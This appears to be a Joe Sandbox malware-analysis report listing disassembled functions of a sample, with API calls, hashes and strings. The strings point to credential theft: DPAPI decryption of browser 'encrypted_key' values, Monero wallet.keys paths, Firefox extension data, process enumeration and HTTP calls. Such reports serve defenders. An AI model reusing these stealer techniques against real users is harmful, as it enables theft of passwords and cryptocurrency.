Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 171ea0bf09e0363e8b3955de2d55e3be30dc412af8a11b7b6ca890fccda82e8e
Instruction ID: 16c57929b9689615073dcfb4d8bc22a12fbec7202e6a6c4556e9b836f08852e9
Opcode Fuzzy Hash: 171ea0bf09e0363e8b3955de2d55e3be30dc412af8a11b7b6ca890fccda82e8e
Instruction Fuzzy Hash: 68E1DE72A10118AADB15FBA4DCA6EEE733CAF15300F508169F51676492EF306A4DCB72

Function 000AD780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 000BA740: lstrcpy.KERNEL32(000C0E17,00000000), ref: 000BA788

Part of subcall function 000BA9B0: lstrlen.KERNEL32(?,01398A60,?,\Monero\wallet.keys,000C0E17), ref: 000BA9C5
Part of subcall function 000BA9B0: lstrcpy.KERNEL32(00000000), ref: 000BAA04
Part of subcall function 000BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000BAA12

Part of subcall function 000BA8A0: lstrcpy.KERNEL32(?,000C0E17), ref: 000BA905

Part of subcall function 000B8B60: GetSystemTime.KERNEL32(000C0E1A,01399EE8,000C05AE,?,?,000A13F9,?,0000001A,000C0E1A,00000000,?,01398A60,?,\Monero\wallet.keys,000C0E17), ref: 000B8B86

Part of subcall function 000BA920: lstrcpy.KERNEL32(00000000,?), ref: 000BA972
Part of subcall function 000BA920: lstrcat.KERNEL32(00000000), ref: 000BA982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 000AD801
lstrlen.KERNEL32(00000000), ref: 000AD99F
lstrlen.KERNEL32(00000000), ref: 000AD9B3
DeleteFileA.KERNEL32(00000000), ref: 000ADA32

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 0b8a6b187acdbd5f5846b2b23a8130d7c8437b6f29e8c42cf868f715ff977447
Instruction ID: c7dc4cbf7e13b1ca19b8c1148fd505caad42349fc295b9956b167fd3ddd64ef6
Opcode Fuzzy Hash: 0b8a6b187acdbd5f5846b2b23a8130d7c8437b6f29e8c42cf868f715ff977447
Instruction Fuzzy Hash: 3181EF72A50108ABDB14FBA4DCA6EEE7338AF55300F504529F507B6493EF346A09DB72

Function 000AF4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON

Download Yara Rule

APIs

Part of subcall function 000BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000BA7E6

Part of subcall function 000A99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000A99EC
Part of subcall function 000A99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 000A9A11
Part of subcall function 000A99C0: LocalAlloc.KERNEL32(00000040,?), ref: 000A9A31
Part of subcall function 000A99C0: ReadFile.KERNEL32(000000FF,?,00000000,000A148F,00000000), ref: 000A9A5A
Part of subcall function 000A99C0: LocalFree.KERNEL32(000A148F), ref: 000A9A90
Part of subcall function 000A99C0: CloseHandle.KERNEL32(000000FF), ref: 000A9A9A

Part of subcall function 000B8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 000B8E52

Part of subcall function 000BA740: lstrcpy.KERNEL32(000C0E17,00000000), ref: 000BA788

Part of subcall function 000BA9B0: lstrlen.KERNEL32(?,01398A60,?,\Monero\wallet.keys,000C0E17), ref: 000BA9C5
Part of subcall function 000BA9B0: lstrcpy.KERNEL32(00000000), ref: 000BAA04
Part of subcall function 000BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000BAA12

Part of subcall function 000BA8A0: lstrcpy.KERNEL32(?,000C0E17), ref: 000BA905

Part of subcall function 000BA920: lstrcpy.KERNEL32(00000000,?), ref: 000BA972
Part of subcall function 000BA920: lstrcat.KERNEL32(00000000), ref: 000BA982

StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,000C1580,000C0D92), ref: 000AF54C
lstrlen.KERNEL32(00000000), ref: 000AF56B

Strings

moz-extension+++, xrefs: 000AF5AD
^userContextId=4294967295, xrefs: 000AF59C

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 998311485-3310892237
Opcode ID: 39dbf27e0c7aac804423274cad86fbffb0df4f83cff2fb2084a8f5684944b206
Instruction ID: 5242a0769a75ef2098c1d570a6051bc83c634655bc3fbed92579b24311f07a18
Opcode Fuzzy Hash: 39dbf27e0c7aac804423274cad86fbffb0df4f83cff2fb2084a8f5684944b206
Instruction Fuzzy Hash: E651DD75E10108BADB14FBA4EC96DED7378AF55300F408528F916A7593EE346A0DCBA2

Function 000A9CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 000BA740: lstrcpy.KERNEL32(000C0E17,00000000), ref: 000BA788

Part of subcall function 000A99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000A99EC
Part of subcall function 000A99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 000A9A11
Part of subcall function 000A99C0: LocalAlloc.KERNEL32(00000040,?), ref: 000A9A31
Part of subcall function 000A99C0: ReadFile.KERNEL32(000000FF,?,00000000,000A148F,00000000), ref: 000A9A5A
Part of subcall function 000A99C0: LocalFree.KERNEL32(000A148F), ref: 000A9A90
Part of subcall function 000A99C0: CloseHandle.KERNEL32(000000FF), ref: 000A9A9A

Part of subcall function 000B8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 000B8E52

StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 000A9D39

Part of subcall function 000A9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 000A9AEF
Part of subcall function 000A9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,000A4EEE,00000000,?), ref: 000A9B01
Part of subcall function 000A9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 000A9B2A
Part of subcall function 000A9AC0: LocalFree.KERNEL32(?,?,?,?,000A4EEE,00000000,?), ref: 000A9B3F

Part of subcall function 000A9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 000A9B84
Part of subcall function 000A9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 000A9BA3
Part of subcall function 000A9B60: LocalFree.KERNEL32(?), ref: 000A9BD3

Strings

DPAPI, xrefs: 000A9D89
"encrypted_key":", xrefs: 000A9D30
, xrefs: 000A9DC1

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 2100535398-738592651
Opcode ID: 8a1eae2675b4e8447e24d033a4970deb1ef8ec38275cb71d2ba8fc23033b2c64
Instruction ID: b5d911ab8dffaec58ea33101e9974bbc35418691e79a5b9aa5c685d946d576c8
Opcode Fuzzy Hash: 8a1eae2675b4e8447e24d033a4970deb1ef8ec38275cb71d2ba8fc23033b2c64
Instruction Fuzzy Hash: CD3145B5E10209ABCF14DFE4DC85EEFB7B8BF49304F144519E905A7242EB349A54CBA1

Function 000B8680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON

Download Yara Rule

APIs

Part of subcall function 000BA740: lstrcpy.KERNEL32(000C0E17,00000000), ref: 000BA788

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,000C05B7), ref: 000B86CA
Process32First.KERNEL32(?,00000128), ref: 000B86DE
Process32Next.KERNEL32(?,00000128), ref: 000B86F3

Part of subcall function 000BA9B0: lstrlen.KERNEL32(?,01398A60,?,\Monero\wallet.keys,000C0E17), ref: 000BA9C5
Part of subcall function 000BA9B0: lstrcpy.KERNEL32(00000000), ref: 000BAA04
Part of subcall function 000BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000BAA12

Part of subcall function 000BA8A0: lstrcpy.KERNEL32(?,000C0E17), ref: 000BA905

CloseHandle.KERNEL32(?), ref: 000B8761

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 1066202413-0
Opcode ID: 2f64c43718763b3049d7717b5531417f6f1ec9b44a55d3295947da863143f344
Instruction ID: cca17f60f1185ce8ff2830635a5f6eaac8520a31392aaf62cccfc758a94af369
Opcode Fuzzy Hash: 2f64c43718763b3049d7717b5531417f6f1ec9b44a55d3295947da863143f344
Instruction Fuzzy Hash: 9A314B71A41218EBCB24DF94DC95FEEB778EB45700F104199E10AA61A1DF306A45CFA1

Function 000B6AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01398930,?,000C110C,?,00000000,?,000C1110,?,00000000,000C0AEF), ref: 000B6ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 000B6AE8
CloseHandle.KERNEL32(00000000), ref: 000B6AF9
Sleep.KERNEL32(00001770), ref: 000B6B04
CloseHandle.KERNEL32(?,00000000,?,01398930,?,000C110C,?,00000000,?,000C1110,?,00000000,000C0AEF), ref: 000B6B1A
ExitProcess.KERNEL32 ref: 000B6B22

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: a1c798e56a996a402a9f87afeb512af9e17866e5fc8e3375c8a37f0078d969bf
Instruction ID: ef6b7e36c6f71bdeaf6e3be6ffa8ff77341fcbd6c673a8c114b372fffbbb193a
Opcode Fuzzy Hash: a1c798e56a996a402a9f87afeb512af9e17866e5fc8e3375c8a37f0078d969bf
Instruction Fuzzy Hash: D7F0FE70A80219ABEB10EBA0EC5ABFE7B74EB04701F104515B512A51D2DBB56540DA67

Function 000A47B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 000A4839
InternetCrackUrlA.WININET(00000000,00000000), ref: 000A4849

Strings

<, xrefs: 000A47C9

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlen
String ID: <
API String ID: 1274457161-4251816714
Opcode ID: d1613199e7507e557dd08026a0b5a43a66e96ec761b2ecb3acfc3d16db5cd607
Instruction ID: 53a4e68147041f1a3b501583f80b5018559f14bec1ae466eabbaff93e053fc12
Opcode Fuzzy Hash: d1613199e7507e557dd08026a0b5a43a66e96ec761b2ecb3acfc3d16db5cd607
Instruction Fuzzy Hash: 6D216FB1D00208ABDF10DFA4EC49ADE7B74FB45320F108625F925AB2D1EB706A09CF91

Function 000B51F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 000BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000BA7E6

Part of subcall function 000A6280: InternetOpenA.WININET(000C0DFE,00000001,00000000,00000000,00000000), ref: 000A62E1
Part of subcall function 000A6280: StrCmpCA.SHLWAPI(?,0139F5E0), ref: 000A6303
Part of subcall function 000A6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 000A6335
Part of subcall function 000A6280: HttpOpenRequestA.WININET(00000000,GET,?,0139ECE8,00000000,00000000,00400100,00000000), ref: 000A6385
Part of subcall function 000A6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 000A63BF
Part of subcall function 000A6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000A63D1

StrCmpCA.SHLWAPI(00000000,ERROR), ref: 000B5228

Strings

ERROR, xrefs: 000B521A
ERROR, xrefs: 000B5273

Memory Dump Source

